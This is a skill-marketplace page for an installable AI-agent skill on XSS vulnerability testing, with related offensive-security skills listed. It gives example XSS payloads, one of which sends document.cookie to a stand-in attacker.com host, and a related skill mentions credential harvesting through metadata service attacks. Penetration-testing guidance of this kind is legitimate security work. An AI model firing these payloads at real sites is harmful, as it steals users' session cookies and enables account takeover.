anandbinuarjun/skills/xss-testing
skills/xss-testing/SKILL.md
# CyberStrikeAI Skill: XSS Vulnerability Testing ## Methodology 1. **Target Identification**: Locate all input fields, URL parameters, and headers that are reflected in the DOM. 2. **Context Analysis**: Determine if the reflection is inside an HTML tag, attribute, or JavaScript block. 3. **Payload Generation**: - Basic: `<script>alert(1)</script>` - Bypassing: `<img src=x onerror=alert(1)>` - Data Exfiltration: `<script>fetch('http://attacker.com/log?c='+document.cookie)</script>` 4.
development
Updated Apr 3, 2026
$ install --global
skillsauthnpx skillsauth add anandbinuarjun/codex-cyebrstike skills/xss-testingInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 3, 2026, 10:26 PM46.1s1 file scanned
SKILL.md
CyberStrikeAI Skill: XSS Vulnerability Testing
Methodology
- Target Identification: Locate all input fields, URL parameters, and headers that are reflected in the DOM.
- Context Analysis: Determine if the reflection is inside an HTML tag, attribute, or JavaScript block.
- Payload Generation:
- Basic:
<script>alert(1)</script> - Bypassing:
<img src=x onerror=alert(1)> - Data Exfiltration:
<script>fetch('http://attacker.com/log?c='+document.cookie)</script>
- Basic:
- Automation:
- Use
dalfoxfor rapid parameter analysis. - Use
ffuffor custom payload fuzzing.
- Use
Role Reference
- Best performed by the Web App Scanner role.
Related Skills
anandbinuarjun/SQL Injection Testing
tools
VerifiedTrustedCommunity
Methods and tools for discovering and exploiting SQL injection vulnerabilities
SKILL.mdUpdated Apr 3, 2026
anandbinuarjun/skills/cloud-security
tools
VerifiedTrustedCommunity
# Cloud Security Audit Skill --- name: cloud-security-audit description: Auditing AWS/Azure/GCP infrastructure and identities. --- ## Methodology 1. **Misconfiguration Scan**: Use `prowler` or `scout-suite` to find quick wins. 2. **Identity Review**: Audit IAM roles for over-privilege or dangling identities. 3. **Storage Audit**: Verify S3 bucket policies and RDS encryption. 4. **Credential Harvesting**: Perform metadata service attacks (IMDSv1/v2). ## Tools - `prowler` - `scout-suite` - `pacu
SKILL.mdUpdated Apr 3, 2026
anandbinuarjun/skills/api-security
tools
VerifiedTrustedCommunity
# API Security Testing Skill --- name: api-security-testing description: Specialized auditing for REST, GraphQL, and gRPC endpoints. --- ## Methodology 1. **Schema Discovery**: Extract API endpoints using `arjun` or `graphql-scanner`. 2. **Logic Check**: Test for BOLA/BFLA (Broken Object/Function Level Authorization). 3. **Mass Assignment**: Identify hidden fields that can be updated via POST/PUT. 4. **Injection**: Fuzz parameters for standard and API-specific injection flaws. ## Tools - `arju
SKILL.mdUpdated Apr 3, 2026
openclaw/openclaw-secret-scanning-maintainer
development
VerifiedTrustedCommunity
Maintainer-only workflow for handling GitHub Secret Scanning alerts on OpenClaw. Use when Codex needs to triage, redact, clean up, and resolve secret leakage found in issue comments, issue bodies, PR comments, or other GitHub content.
357,764SKILL.mdUpdated Apr 15, 2026